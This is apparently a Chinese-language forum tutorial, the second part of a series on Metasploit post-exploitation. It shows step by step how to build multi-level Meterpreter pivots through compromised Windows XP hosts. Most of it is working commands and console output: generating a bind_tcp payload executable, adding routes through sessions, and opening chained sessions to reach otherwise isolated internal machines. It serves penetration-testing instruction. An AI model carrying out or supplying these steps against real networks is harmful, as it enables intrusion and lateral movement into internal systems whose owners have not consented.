Metasploit渗透技巧:后渗透Meterpreter代理2
配置好以后看看使用 proxychains进行代理访问,这里访问10.1.1.129 3389端口
http://p35.qhimg.com/t01efa607a4afaa1950.jpg?size=690x568
可以看到已经成功访问
0×02 多级代理
1. 二级代理隧道
上面介绍了meterpreter基础的代理方法,但是有些实际环境不能直接使用,考虑如下环境(内网机器A、B。A机器可以对外连接,但是访问控制很严格,只能访问到很少的内网机器,B机器不能对外连接,但是可以访问到很多核心服务和机器,A、B之间可以互相访问),如果我们想通过B机器对核心服务和机器进行扫描和访问要怎么办呢?
这时候我们就meterpreter的pivot组合轻松实现二级代理就可以
效果示意图:attacker->xp-test1->xp-test2
首先接着上面,我们已经有一个xp-test1反弹回来的meterprter了,接着我们生成一个正向的执行文件
root@kali:~# msfpayload windows/meterpreter/bind_tcp RHOST=0.0.0.0 RPORT=4444 X > Rmeter.exe [!] ************************************************************************ [!] * The utility msfpayload is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/bind_tcp Length: 285 Options: {"RHOST"=>"0.0.0.0", "RPORT"=>"4444"}
生成好以后在xp-test2上面运行
接着在msf里面添加路由
msf exploit(handler) > route add 10.1.1.129 255.255.255.255 2
[*] Route added msf exploit(handler) > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 10.1.1.129 255.255.255.255 Session 2
连接正向 meterpreter获取权限
msf exploit(handler) > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows//bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(handler) > set RHOST 10.1.1.129 RHOST => 10.1.1.129 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LPORT 444 yes The listen port RHOST 10.1.1.129 no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LPORT 4444 yes The listen port RHOST 10.1.1.129 no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > run
[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (770048 bytes)
[*] Meterpreter session 3 opened (192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444) at 2015-01-11 13:34:37 +0800
现在已经获取到xp-test2的权限,注意这里是通过xp-test1 pivot代理
下面来验证下,查看xp-test2 4444端口
C:\Documents and Settings\Administrator>netstat -an | find "4444" TCP 10.1.1.129:4444 10.1.1.128:1051 ESTABLISHED
是通过xp-test1进行连接的。
这时候二级代理已经搭建好了,你可以添加需要访问的ip到路由表,通过第二层的session(session 3),就可以使用metaploit的其他模块访问或扫描了。
2.三级或多级代理
有时候过于庞大或者复杂的内网环境,甚至需要三层或者多层代理,原理与两层相似,通过在第二层代理的基础上进行连接既可
示意图:attacket->xp-test1->xp-test2->xp-test3->…..
与两层代理类似,如下实现:
msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter x86/win32 XP-TEST1\Administrator @ XP-TEST1 192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128) 4 meterpreter x86/win32 XP-TEST2\Administrator @ XP-TEST2 192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129) msf exploit(handler) > route add 10.1.1.131 4 [-] Missing arguments to route add. msf exploit(handler) > route add 10.1.1.131 255.255.255.255 4
[*] Route added msf exploit(handler) > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 10.1.1.129 255.255.255.255 Session 2 10.1.1.131 255.255.255.255 Session 4 msf exploit(handler) > set RHOST=10.1.1.131 [-] Unknown variable Usage: set Set the given option to value. If value is omitted, print the current value. If both are omitted, print options that are currently set. If run from a module context, this will set the value in the module's datastore. Use -g to operate on the global datastore msf exploit(handler) > set RHOST 10.1.1.131 RHOST => 10.1.1.131 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LPORT 4444 yes The listen port RHOST 10.1.1.131 no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > run
[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (770048 bytes)
[*] Meterpreter session 5 opened (192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444) at 2015-01-11 13:45:53 +0800 meterpreter > background
[*] Backgrounding session 5... msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter x86/win32 XP-TEST1\Administrator @ XP-TEST1 192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128) 4 meterpreter x86/win32 XP-TEST2\Administrator @ XP-TEST2 192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129) 5 meterpreter x86/win32 XP-TEST3\Administrator @ XP-TEST3 192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444 (10.1.1.131) 在xp-test3查看端口连接 C:\Documents and Settings\Administrator>netstat -an | find "4444" TCP 10.1.1.131:4444 10.1.1.129:1032 ESTABLISHED 在xp-test2查看4444端口 C:\Documents and Settings\Administrator>netstat -an | find "4444" TCP 10.1.1.129:1032 10.1.1.131:4444 ESTABLISHED TCP 10.1.1.129:4444 10.1.1.128:1054 ESTABLISHED 说明已经实现三级连接,即attacker->xp-test1->xp-test2->xp-test3
0×03 总结
最后,代理级数越多,带宽损耗和稳定性就会下降。渗透过程中根据实际情况自由灵活的选择和使用代理方式才能实现事半工倍的效果。
页:
[1]